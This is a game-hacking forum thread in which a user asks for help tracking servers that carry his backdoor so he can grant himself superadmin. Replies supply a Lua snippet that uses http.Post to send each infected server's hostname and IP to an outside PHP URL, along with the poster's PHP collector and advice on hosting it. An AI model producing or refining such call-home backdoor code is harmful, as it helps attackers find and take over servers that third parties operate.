Results 1 to 9 of 9
  1. #1
    pmcallp323's Avatar
    Join Date
    Jul 2015
    Gender
    male
    Posts
    5
    Reputation
    10
    Thanks
    0

    Unhappy Can Someone Help

    Can Someone Help Me Be Able To Track Servers That Have My Backdoor, So Then I Can Become SuperAdmin And Do Other Stuff,
    Please Give Your PHP, Or Lua Files

  2. #2
    kaliii's Avatar
    Join Date
    Feb 2016
    Gender
    male
    Posts
    32
    Reputation
    10
    Thanks
    1,485
    http.Post && http.Fetch

  3. The Following User Says Thank You to kaliii For This Useful Post:

    pmcallp323 (08-23-2016)

  4. #3
    cudex's Avatar
    Join Date
    Apr 2016
    Gender
    female
    Posts
    13
    Reputation
    10
    Thanks
    0
    Quote Originally Posted by kaliii View Post
    http.Post && http.Fetch
    i wanna know this too, do i need some special php code ?, and can u provide me with the lua?

  5. #4
    Cyaegha's Avatar
    Join Date
    Aug 2016
    Gender
    male
    Posts
    536
    Reputation
    17
    Thanks
    526
    Quote Originally Posted by cudex View Post
    i wanna know this too, do i need some special php code ?, and can u provide me with the lua?
    Code:
    http.Post("url to php",
    	{
    		["server"] = tostring(GetHostName()),
    		["ip"] = tostring(game.GetIPAddress()),
    	},
    	
    	function()
    	end,
    	
    	function()
    	end
    )

  6. The Following User Says Thank You to Cyaegha For This Useful Post:

    pmcallp323 (08-23-2016)

  7. #5
    pmcallp323's Avatar
    Join Date
    Jul 2015
    Gender
    male
    Posts
    5
    Reputation
    10
    Thanks
    0
    could you also post the php side?

    - - - Updated - - -

    so far this is my php

    <?php
    $servername = $_POST['server'];
    $serverip = $_POST['ip'];
    $data = "IP: " . $serverip . "Server Name: " . $servername;
    $file = "output.txt";
    file_put_contents($file, $data);
    ?>

    - - - Updated - - -

    but i have tested and the output.txt has nothing inside it

  8. #6
    pmcallp323's Avatar
    Join Date
    Jul 2015
    Gender
    male
    Posts
    5
    Reputation
    10
    Thanks
    0
    i think it is my free web host that does disable file_put_contents

    - - - Updated - - -

    if any of you know of a web host that this will work with?

  9. #7
    Cyaegha's Avatar
    Join Date
    Aug 2016
    Gender
    male
    Posts
    536
    Reputation
    17
    Thanks
    526
    Quote Originally Posted by pmcallp323 View Post
    i think it is my free web host that does disable file_put_contents

    - - - Updated - - -

    if any of you know of a web host that this will work with?
    Get a shitty VPS for like $4/month.

  10. #8
    Gorzoid's Avatar
    Join Date
    Jun 2014
    Gender
    male
    Posts
    227
    Reputation
    10
    Thanks
    990
    most webhosts have mysql even if they are free, make a database containing ip and servername(make sure to sanitize this input to stop sql injection), also you don't need to include ip address in post data just use $_SERVER['REMOTE_ADDR']
    I am just here to learn, definitely not for hacks... o_O Just learning

  11. #9
    Smoke's Avatar
    Join Date
    Nov 2014
    Gender
    male
    Posts
    11,901
    Reputation
    2661
    Thanks
    4,610
    My Mood
    Amazed
    Been over a week since last update/bump after answers, assuming solved.

    /Closed.


    CLICK TO BUY NOW!!


    Quote Originally Posted by Liz View Post
    This is my first vouch, ever. Rapidgator account worked perfectly. Would buy in the future.

Similar Threads

  1. [Help Request] Can someone help me?
    By 71c in forum Minecraft Help
    Replies: 17
    Last Post: 12-23-2012, 02:13 AM
  2. [Help Request] Can someone help me? Is there anything mods, consoles, binds, etc. working?
    By ursala in forum Vindictus Help
    Replies: 3
    Last Post: 11-05-2012, 08:17 AM
  3. [Help Request] Can Someone Help Me Open My Nat Type PLZ?
    By trhsterdHSTEhstehththth in forum Call of Duty Modern Warfare 3 Help
    Replies: 1
    Last Post: 10-19-2012, 03:33 PM
  4. [Help Request] Can SomeOne Help Me Pls ?
    By yousefghaly in forum Visual Basic Programming
    Replies: 3
    Last Post: 09-15-2012, 04:32 PM
  5. [Help Request] Can someone help me with this code
    By L33tHaxorCod3r in forum Minecraft Help
    Replies: 3
    Last Post: 07-16-2012, 11:48 AM